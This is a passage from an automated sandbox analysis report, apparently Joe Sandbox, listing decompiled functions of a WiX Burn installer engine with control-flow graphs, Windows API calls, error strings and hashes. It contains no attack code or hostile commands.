                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: File$ErrorLast$Read$Pointer$Heap$AllocateProcess
                                                            • String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to engine process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$burn$section.cpp
                                                            • API String ID: 3411815225-695169583
                                                            • Opcode ID: b18ee4a990094f653549b4929ba96690b0c06b10cf22971d60d2a5302e37dbd1
                                                            • Instruction ID: ea61a453fba0c45d2692553242233e1223d8ce075925d292b3f2a18ab04be4f4
                                                            • Opcode Fuzzy Hash: b18ee4a990094f653549b4929ba96690b0c06b10cf22971d60d2a5302e37dbd1
                                                            • Instruction Fuzzy Hash: 4112C176A44235ABDB309B558C49FAA7BA8EB45B20F1541A6FD0CBB2C1D770DD408BF0
                                                            Function 00D20D16 Relevance: 54.6, APIs: 20, Strings: 11, Instructions: 306synchronizationCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 587 d20d16-d20d2d SetEvent 588 d20d6f-d20d7d WaitForSingleObject 587->588 589 d20d2f-d20d39 GetLastError 587->589 590 d20db4-d20dbf ResetEvent 588->590 591 d20d7f-d20d89 GetLastError 588->591 592 d20d46 589->592 593 d20d3b-d20d44 589->593 596 d20dc1-d20dcb GetLastError 590->596 597 d20df9-d20dff 590->597 594 d20d96 591->594 595 d20d8b-d20d94 591->595 598 d20d48 592->598 599 d20d4d-d20d5d call d03821 592->599 593->592 602 d20d98 594->602 603 d20d9d-d20db2 call d03821 594->603 595->594 604 d20dd8 596->604 605 d20dcd-d20dd6 596->605 600 d20e32-d20e4b call d021ac 597->600 601 d20e01-d20e04 597->601 598->599 614 d20d62-d20d6a call d40237 599->614 623 d20e63-d20e6e SetEvent 600->623 624 d20e4d-d20e5e call d40237 600->624 610 d20e06-d20e23 call d03821 601->610 611 d20e28-d20e2d 601->611 602->603 603->614 607 d20dda 604->607 608 d20ddf-d20df4 call d03821 604->608 605->604 607->608 608->614 630 d210de-d210e4 call d40237 610->630 617 d210e8-d210ed 611->617 614->617 625 d210f2-d210f8 617->625 626 d210ef 617->626 627 d20e70-d20e7a GetLastError 623->627 628 d20ea8-d20eb6 WaitForSingleObject 623->628 638 d210e5-d210e7 624->638 626->625 632 d20e87 627->632 633 d20e7c-d20e85 627->633 634 d20ef0-d20efb ResetEvent 628->634 635 d20eb8-d20ec2 GetLastError 628->635 630->638 641 d20e89 632->641 642 d20e8e-d20ea3 call d03821 632->642 633->632 639 d20f35-d20f3c 634->639 640 d20efd-d20f07 GetLastError 634->640 643 d20ec4-d20ecd 635->643 644 d20ecf 635->644 638->617 649 d20fab-d20fce CreateFileW 639->649 650 d20f3e-d20f41 639->650 646 d20f14 640->646 647 d20f09-d20f12 640->647 641->642 665 d210dd 642->665 643->644 651 d20ed1 644->651 652 d20ed6-d20eeb call d03821 644->652 653 d20f16 646->653 654 d20f1b-d20f30 call d03821 646->654 647->646 656 d20fd0-d20fda GetLastError 649->656 657 d2100b-d2101f SetFilePointerEx 649->657 658 d20f43-d20f46 650->658 659 d20f6e-d20f72 call d0394f 650->659 651->652 652->665 653->654 654->665 666 d20fe7 656->666 667 d20fdc-d20fe5 656->667 661 d21021-d2102b GetLastError 657->661 662 d21059-d21064 SetEndOfFile 657->662 668 d20f67-d20f69 658->668 669 d20f48-d20f4b 658->669 673 d20f77-d20f7c 659->673 671 d21038 661->671 672 d2102d-d21036 661->672 675 d21066-d21070 GetLastError 662->675 676 d2109b-d210a8 SetFilePointerEx 662->676 665->630 677 d20fe9 666->677 678 d20fee-d21001 call d03821 666->678 667->666 668->617 679 d20f5d-d20f62 669->679 680 d20f4d-d20f53 669->680 684 d2103a 671->684 685 d2103f-d21054 call d03821 671->685 672->671 682 d20f7e-d20f98 call d03821 673->682 683 d20f9d-d20fa6 673->683 686 d21072-d2107b 675->686 687 d2107d 675->687 676->638 681 d210aa-d210b4 GetLastError 676->681 677->678 678->657 679->638 680->679 689 d210c1 681->689 690 d210b6-d210bf 681->690 682->665 683->638 684->685 685->665 686->687 693 d21084-d21099 call d03821 687->693 694 d2107f 687->694 696 d210c3 689->696 697 d210c8-d210d8 call d03821 689->697 690->689 693->665 694->693 696->697 697->665
                                                            APIs
                                                            • SetEvent.KERNEL32(?,?,?,?,?,00D208BC,?,?), ref: 00D20D25
                                                            • GetLastError.KERNEL32(?,?,?,?,00D208BC,?,?), ref: 00D20D2F
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,00D208BC,?,?), ref: 00D20D74
                                                            • GetLastError.KERNEL32(?,?,?,?,00D208BC,?,?), ref: 00D20D7F
                                                            • ResetEvent.KERNEL32(?,?,?,?,?,00D208BC,?,?), ref: 00D20DB7
                                                            • GetLastError.KERNEL32(?,?,?,?,00D208BC,?,?), ref: 00D20DC1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$Event$ObjectResetSingleWait
                                                            • String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                            • API String ID: 1865021742-2104912459
                                                            • Opcode ID: 50a5bc40d554fe049361cd78298ff1b87ae818969a889c04406d0104b060f7fb
                                                            • Instruction ID: a15fc8a2133478f56c57afd0dc6f4b6474e914a07b6a10f1d5956488417e6fb7
                                                            • Opcode Fuzzy Hash: 50a5bc40d554fe049361cd78298ff1b87ae818969a889c04406d0104b060f7fb
                                                            • Instruction Fuzzy Hash: EE91363BA81732ABD7301AA96E49B2A3D54BF31B35F168321BE14BA6C1D351DC0486F1
                                                            Function 00D05195 Relevance: 38.8, APIs: 5, Strings: 17, Instructions: 315COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 864 d05195-d05243 call d2f8e0 * 2 GetModuleHandleW call d404f8 call d406ae call d0120a 875 d05245 864->875 876 d05259-d0526a call d042d7 864->876 877 d0524a-d05254 call d40237 875->877 881 d05273-d0528f call d05618 CoInitializeEx 876->881 882 d0526c-d05271 876->882 885 d054d4-d054db 877->885 892 d05291-d05296 881->892 893 d05298-d052a4 call d3fcae 881->893 882->877 887 d054e8-d054ea 885->887 888 d054dd-d054e3 call d45636 885->888 890 d054fa-d05518 call d0d82f call d1a8d6 call d1ab24 887->890 891 d054ec-d054f3 887->891 888->887 914 d05546-d05559 call d04fa4 890->914 915 d0551a-d05522 890->915 891->890 894 d054f5 call d141ec 891->894 892->877 901 d052a6 893->901 902 d052b8-d052c7 call d40e07 893->902 894->890 904 d052ab-d052b3 call d40237 901->904 911 d052d0-d052df call d42af7 902->911 912 d052c9-d052ce 902->912 904->885 919 d052e1-d052e6 911->919 920 d052e8-d052f7 call d43565 911->920 912->904 924 d05560-d05567 914->924 925 d0555b call d43a35 914->925 915->914 918 d05524-d05527 915->918 918->914 922 d05529-d05544 call d1434c call d05602 918->922 919->904 933 d05300-d0531f GetVersionExW 920->933 934 d052f9-d052fe 920->934 922->914 930 d05569 call d42efe 924->930 931 d0556e-d05575 924->931 925->924 930->931 936 d05577 call d41479 931->936 937 d0557c-d05583 931->937 939 d05321-d0532b GetLastError 933->939 940 d05359-d0539e call d033c7 call d05602 933->940 934->904 936->937 942 d05585 call d3fdbd 937->942 943 d0558a-d0558c 937->943 948 d05338 939->948 949 d0532d-d05336 939->949 966 d053a0-d053ab call d45636 940->966 967 d053b1-d053c1 call d1752a 940->967 942->943 946 d05594-d0559b 943->946 947 d0558e CoUninitialize 943->947 951 d055d6-d055df call d40113 946->951 952 d0559d-d0559f 946->952 947->946 953 d0533a 948->953 954 d0533f-d05354 call d03821 948->954 949->948 964 d055e1 call d045ee 951->964 965 d055e6-d055ff call d40802 call d2e06f 951->965 957 d055a1-d055a3 952->957 958 d055a5-d055ab 952->958 953->954 954->904 962 d055ad-d055c6 call d13d85 call d05602 957->962 958->962 962->951 983 d055c8-d055d5 call d05602 962->983 964->965 966->967 979 d053c3 967->979 980 d053cd-d053d6 967->980 979->980 984 d053dc-d053df 980->984 985 d0549e-d054b4 call d04d39 980->985 983->951 988 d053e5-d053e8 984->988 989 d05476-d05489 call d04ae5 984->989 998 d054c0-d054d2 985->998 999 d054b6 985->999 990 d053ea-d053ed 988->990 991 d0544e-d0546a call d048ef 988->991 997 d0548e-d05492 989->997 995 d05426-d05442 call d04a88 990->995 996 d053ef-d053f2 990->996 991->998 1006 d0546c 991->1006 995->998 1010 d05444 995->1010 1002 d05403-d05416 call d04c86 996->1002 1003 d053f4-d053f9 996->1003 997->998 1004 d05494 997->1004 998->885 999->998 1002->998 1011 d0541c 1002->1011 1003->1002 1004->985 1006->989 1010->991 1011->995
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 00D05217
                                                              • Part of subcall function 00D404F8: InitializeCriticalSection.KERNEL32(00D6B5FC,?,00D05223,00000000,?,?,?,?,?,?), ref: 00D4050F
                                                              • Part of subcall function 00D0120A: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,00D0523F,00000000,?), ref: 00D01248
                                                              • Part of subcall function 00D0120A: GetLastError.KERNEL32(?,?,?,00D0523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00D01252
                                                            • CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00D05285
                                                              • Part of subcall function 00D40E07: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00D40E28
                                                            • GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 00D05317
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00D05321
                                                            • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00D0558E
                                                            Strings
                                                            • engine.cpp, xrefs: 00D05345
                                                            • Failed to initialize Regutil., xrefs: 00D052C9
                                                            • Failed to initialize engine state., xrefs: 00D0526C
                                                            • Failed to parse command line., xrefs: 00D05245
                                                            • 3.11.1.2318, xrefs: 00D05384
                                                            • Invalid run mode., xrefs: 00D053F9
                                                            • Failed to initialize XML util., xrefs: 00D052F9
                                                            • Failed to get OS info., xrefs: 00D0534F
                                                            • Failed to initialize Wiutil., xrefs: 00D052E1
                                                            • Failed to initialize COM., xrefs: 00D05291
                                                            • Failed to run embedded mode., xrefs: 00D05444
                                                            • Failed to initialize core., xrefs: 00D053C3
                                                            • Failed to initialize Cryputil., xrefs: 00D052A6
                                                            • Failed to run RunOnce mode., xrefs: 00D0541C
                                                            • Failed to run per-user mode., xrefs: 00D05494
                                                            • Failed to run untrusted mode., xrefs: 00D054B6
                                                            • Failed to run per-machine mode., xrefs: 00D0546C
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
                                                            • String ID: 3.11.1.2318$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize engine state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$engine.cpp
                                                            • API String ID: 3262001429-510904028
                                                            • Opcode ID: 3dca1ae9d62c6f9b8c4f8d236fe5be7fb4b5e491eacf10e42935630cc314e315
                                                            • Instruction ID: b20c82bde4491c8dcb5e25340bf4a5fe37e9b04a5441f8990ba6f9436ebff27b
                                                            • Opcode Fuzzy Hash: 3dca1ae9d62c6f9b8c4f8d236fe5be7fb4b5e491eacf10e42935630cc314e315
                                                            • Instruction Fuzzy Hash: 5AB18171D40A29ABDB31AF64AC46BEE76B4AF14310F440196FD0CA6285DB71DE84CFB1
                                                            Function 00D1752A Relevance: 37.0, APIs: 1, Strings: 20, Instructions: 291COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1012 d1752a-d1756f call d2f8e0 call d0762c 1017 d17571-d17576 1012->1017 1018 d1757b-d1758c call d0c407 1012->1018 1019 d17814-d1781b call d40237 1017->1019 1024 d17598-d175a9 call d0c26e 1018->1024 1025 d1758e-d17593 1018->1025 1026 d1781c-d17821 1019->1026 1031 d175b5-d175ca call d0c4c8 1024->1031 1032 d175ab-d175b0 1024->1032 1025->1019 1028 d17823-d17824 call d45636 1026->1028 1029 d17829-d1782d 1026->1029 1028->1029 1034 d17837-d1783c 1029->1034 1035 d1782f-d17832 call d45636 1029->1035 1044 d175d6-d175e6 call d2c001 1031->1044 1045 d175cc-d175d1 1031->1045 1032->1019 1036 d17844-d17851 call d0c1bb 1034->1036 1037 d1783e-d1783f call d45636 1034->1037 1035->1034 1046 d17853-d17856 call d45636 1036->1046 1047 d1785b-d1785f 1036->1047 1037->1036 1053 d175f2-d17665 call d15c33 1044->1053 1054 d175e8-d175ed 1044->1054 1045->1019 1046->1047 1051 d17861-d17864 call d45636 1047->1051 1052 d17869-d1786d 1047->1052 1051->1052 1056 d17877-d1787f 1052->1056 1057 d1786f-d17872 call d03a16 1052->1057 1061 d17671-d17676 1053->1061 1062 d17667-d1766c 1053->1062 1054->1019 1057->1056 1063 d17678 1061->1063 1064 d1767d-d176b4 call d05602 GetCurrentProcess call d40879 call d0827b 1061->1064 1062->1019 1063->1064 1071 d176b6 1064->1071 1072 d176ce-d176e5 call d0827b 1064->1072 1073 d176bb-d176c9 call d40237 1071->1073 1078 d176e7-d176ec 1072->1078 1079 d176ee-d176f3 1072->1079 1073->1026 1078->1073 1080 d176f5-d17707 call d0821f 1079->1080 1081 d1774f-d17754 1079->1081 1089 d17713-d17723 call d03436 1080->1089 1090 d17709-d1770e 1080->1090 1083 d17774-d1777d 1081->1083 1084 d17756-d17768 call d0821f 1081->1084 1086 d17789-d1779d call d1a50c 1083->1086 1087 d1777f-d17782 1083->1087 1084->1083 1097 d1776a-d1776f 1084->1097 1099 d177a6 1086->1099 1100 d1779f-d177a4 1086->1100 1087->1086 1091 d17784-d17787 1087->1091 1103 d17725-d1772a 1089->1103 1104 d1772f-d17743 call d0821f 1089->1104 1090->1019 1091->1086 1094 d177ac-d177af 1091->1094 1101 d177b1-d177b4 1094->1101 1102 d177b6-d177cc call d0d5a0 1094->1102 1097->1019 1099->1094 1100->1019 1101->1026 1101->1102 1109 d177d5-d177e4 call d0cbc5 1102->1109 1110 d177ce-d177d3 1102->1110 1103->1019 1104->1081 1111 d17745-d1774a 1104->1111 1113 d177e9-d177ed 1109->1113 1110->1019 1111->1019 1114 d177f6-d1780d call d0c8e6 1113->1114 1115 d177ef-d177f4 1113->1115 1114->1026 1118 d1780f 1114->1118 1115->1019 1118->1019
                                                            Strings
                                                            • WixBundleSourceProcessPath, xrefs: 00D176F8
                                                            • Failed to load catalog files., xrefs: 00D1780F
                                                            • Failed to initialize variables., xrefs: 00D17571
                                                            • Failed to set source process folder variable., xrefs: 00D17745
                                                            • Failed to parse command line., xrefs: 00D17667
                                                            • Failed to get unique temporary folder for bootstrapper application., xrefs: 00D177CE
                                                            • Failed to initialize internal cache functionality., xrefs: 00D1779F
                                                            • Failed to get source process folder from path., xrefs: 00D17725
                                                            • Failed to set original source variable., xrefs: 00D1776A
                                                            • Failed to overwrite the %ls built-in variable., xrefs: 00D176BB
                                                            • Failed to open attached UX container., xrefs: 00D1758E
                                                            • WixBundleUILevel, xrefs: 00D176D6, 00D176E7
                                                            • Failed to set source process path variable., xrefs: 00D17709
                                                            • Failed to open manifest stream., xrefs: 00D175AB
                                                            • Failed to extract bootstrapper application payloads., xrefs: 00D177EF
                                                            • WixBundleOriginalSource, xrefs: 00D17759
                                                            • WixBundleElevated, xrefs: 00D176A5, 00D176B6
                                                            • WixBundleSourceProcessFolder, xrefs: 00D17734
                                                            • Failed to load manifest., xrefs: 00D175E8
                                                            • Failed to get manifest stream from container., xrefs: 00D175CC
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalInitializeSection
                                                            • String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleUILevel
                                                            • API String ID: 32694325-1564579409
                                                            • Opcode ID: 8e5761592cbb90c9aaf7d2dd5f93b9fd865c8827185ed81168fe6a40d8c8c12b
                                                            • Instruction ID: 029811b71833518de0c932def0e45c01ead8119767cf4bf28374fec9f36ad9f0
                                                            • Opcode Fuzzy Hash: 8e5761592cbb90c9aaf7d2dd5f93b9fd865c8827185ed81168fe6a40d8c8c12b
                                                            • Instruction Fuzzy Hash: 2FA183B2A44615BFDB129BA4DC85FEAB77CBB04700F040266F915E7191DB70E988CBB1
                                                            Function 00D0762C Relevance: 34.9, APIs: 1, Strings: 22, Instructions: 420COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1224 d0762c-d07edf InitializeCriticalSection 1225 d07ee2-d07f06 call d05623 1224->1225 1228 d07f13-d07f24 call d40237 1225->1228 1229 d07f08-d07f0f 1225->1229 1233 d07f27-d07f39 call d2e06f 1228->1233 1229->1225 1230 d07f11 1229->1230 1230->1233
                                                            APIs
                                                            • InitializeCriticalSection.KERNEL32(00D1756B,00D053BD,00000000,00D05445), ref: 00D0764C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalInitializeSection
                                                            • String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleUILevel$WixBundleVersion
                                                            • API String ID: 32694325-3635313340
                                                            • Opcode ID: 73e87a34b08795e3949ca3b6c71ac67947f9e477740b668f17a86356c8a07249
                                                            • Instruction ID: c642a0d7c1ec496f55e97f4eafe1c218f4f61d6db3db27b183688d87f1563ba4
                                                            • Opcode Fuzzy Hash: 73e87a34b08795e3949ca3b6c71ac67947f9e477740b668f17a86356c8a07249
                                                            • Instruction Fuzzy Hash: 23324CB0D126299FDBA5CF5AC9887CDFAB4BB49304F5091EED20CA6350C7B05B848F65
                                                            Function 00D182BA Relevance: 31.7, APIs: 7, Strings: 11, Instructions: 153COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1236 d182ba-d18303 call d2f8e0 1239 d18309-d18317 GetCurrentProcess call d40879 1236->1239 1240 d1847c-d18489 call d02195 1236->1240 1244 d1831c-d18329 1239->1244 1245 d18498-d184aa call d2e06f 1240->1245 1246 d1848b 1240->1246 1247 d183b7-d183c5 GetTempPathW 1244->1247 1248 d1832f-d1833e GetWindowsDirectoryW 1244->1248 1249 d18490-d18497 call d40237 1246->1249 1251 d183c7-d183d1 GetLastError 1247->1251 1252 d183ff-d18411 UuidCreate 1247->1252 1253 d18340-d1834a GetLastError 1248->1253 1254 d18378-d18389 call d0337f 1248->1254 1249->1245 1260 d183d3-d183dc 1251->1260 1261 d183de 1251->1261 1256 d18413-d18418 1252->1256 1257 d1841a-d1842f StringFromGUID2 1252->1257 1262 d18357 1253->1262 1263 d1834c-d18355 1253->1263 1274 d18395-d183ab call d036a3 1254->1274 1275 d1838b-d18390 1254->1275 1256->1249 1270 d18431-d1844b call d03821 1257->1270 1271 d1844d-d1846e call d01f13 1257->1271 1260->1261 1264 d183e0 1261->1264 1265 d183e5-d183fa call d03821 1261->1265 1266 d18359 1262->1266 1267 d1835e-d18373 call d03821 1262->1267 1263->1262 1264->1265 1265->1249 1266->1267 1267->1249 1270->1249 1284 d18470-d18475 1271->1284 1285 d18477 1271->1285 1274->1252 1286 d183ad-d183b2 1274->1286 1275->1249 1284->1249 1285->1240 1286->1249
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00D05489), ref: 00D18310
                                                              • Part of subcall function 00D40879: OpenProcessToken.ADVAPI32(?,00000008,?,00D053BD,00000000,?,?,?,?,?,?,?,00D1769D,00000000), ref: 00D40897
                                                              • Part of subcall function 00D40879: GetLastError.KERNEL32(?,?,?,?,?,?,?,00D1769D,00000000), ref: 00D408A1
                                                              • Part of subcall function 00D40879: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,00D1769D,00000000), ref: 00D4092B
                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 00D18336
                                                            • GetLastError.KERNEL32 ref: 00D18340
                                                            • GetTempPathW.KERNEL32(00000104,?,00000000), ref: 00D183BD
                                                            • GetLastError.KERNEL32 ref: 00D183C7
                                                            • UuidCreate.RPCRT4(?), ref: 00D18406
                                                            Strings
                                                            • Failed to get windows path for working folder., xrefs: 00D1836E
                                                            • Failed to convert working folder guid into string., xrefs: 00D18446
                                                            • Failed to create working folder guid., xrefs: 00D18413
                                                            • cache.cpp, xrefs: 00D18364, 00D183EB, 00D1843C
                                                            • %ls%ls\, xrefs: 00D18458
                                                            • Failed to copy working folder path., xrefs: 00D1848B
                                                            • Failed to get temp path for working folder., xrefs: 00D183F5
                                                            • Failed to concat Temp directory on windows path for working folder., xrefs: 00D183AD
                                                            • Failed to ensure windows path for working folder ended in backslash., xrefs: 00D1838B
                                                            • Temp\, xrefs: 00D18395
                                                            • Failed to append bundle id on to temp path for working folder., xrefs: 00D18470
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$Process$CloseCreateCurrentDirectoryHandleOpenPathTempTokenUuidWindows
                                                            • String ID: %ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
                                                            • API String ID: 266130487-819636856
                                                            • Opcode ID: db33b20fd311039201bb000ba42a8b18f2cc2d000151e7ef09613d903ec8ce0d
                                                            • Instruction ID: 884cf660cce48c7534ba966ac29c2c6f46c53dbef1d51632ae998fa36db59a07
                                                            • Opcode Fuzzy Hash: db33b20fd311039201bb000ba42a8b18f2cc2d000151e7ef09613d903ec8ce0d
                                                            • Instruction Fuzzy Hash: 0B411976E41325BBDB30DAA49C0AFDA776CAB14B11F044161BE48F7280EE74DD4856F1
                                                            Function 00D210FB Relevance: 30.0, APIs: 8, Strings: 9, Instructions: 217COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1287 d210fb-d21127 CoInitializeEx 1288 d2113b-d21186 call d3f483 1287->1288 1289 d21129-d21136 call d40237 1287->1289 1295 d211b0-d211d2 call d3f4a4 1288->1295 1296 d21188-d211ab call d03821 call d40237 1288->1296 1294 d2139e-d213b0 call d2e06f 1289->1294 1304 d211d8-d211e0 1295->1304 1305 d2128c-d21297 SetEvent 1295->1305 1315 d21397-d21398 CoUninitialize 1296->1315 1309 d211e6-d211ec 1304->1309 1310 d2138f-d21392 call d3f4b4 1304->1310 1306 d212d6-d212e4 WaitForSingleObject 1305->1306 1307 d21299-d212a3 GetLastError 1305->1307 1311 d212e6-d212f0 GetLastError 1306->1311 1312 d21318-d21323 ResetEvent 1306->1312 1313 d212b0 1307->1313 1314 d212a5-d212ae 1307->1314 1309->1310 1317 d211f2-d211fa 1309->1317 1310->1315 1318 d212f2-d212fb 1311->1318 1319 d212fd 1311->1319 1320 d21325-d2132f GetLastError 1312->1320 1321 d2135a-d21360 1312->1321 1322 d212b2 1313->1322 1323 d212b4-d212c4 call d03821 1313->1323 1314->1313 1315->1294 1324 d21274-d21287 call d40237 1317->1324 1325 d211fc-d211fe 1317->1325 1318->1319 1329 d21301-d21316 call d03821 1319->1329 1330 d212ff 1319->1330 1331 d21331-d2133a 1320->1331 1332 d2133c 1320->1332 1326 d21362-d21365 1321->1326 1327 d2138a 1321->1327 1322->1323 1362 d212c9-d212d1 call d40237 1323->1362 1324->1310 1334 d21200 1325->1334 1335 d21211-d21214 1325->1335 1338 d21386-d21388 1326->1338 1339 d21367-d21381 call d03821 1326->1339 1327->1310 1329->1362 1330->1329 1331->1332 1344 d21340-d21355 call d03821 1332->1344 1345 d2133e 1332->1345 1336 d21202-d21204 1334->1336 1337 d21206-d2120f 1334->1337 1340 d21216 1335->1340 1341 d2126e 1335->1341 1347 d21270-d21272 1336->1347 1337->1347 1338->1310 1339->1362 1349 d21232-d21237 1340->1349 1350 d21263-d21268 1340->1350 1351 d21240-d21245 1340->1351 1352 d21247-d2124c 1340->1352 1353 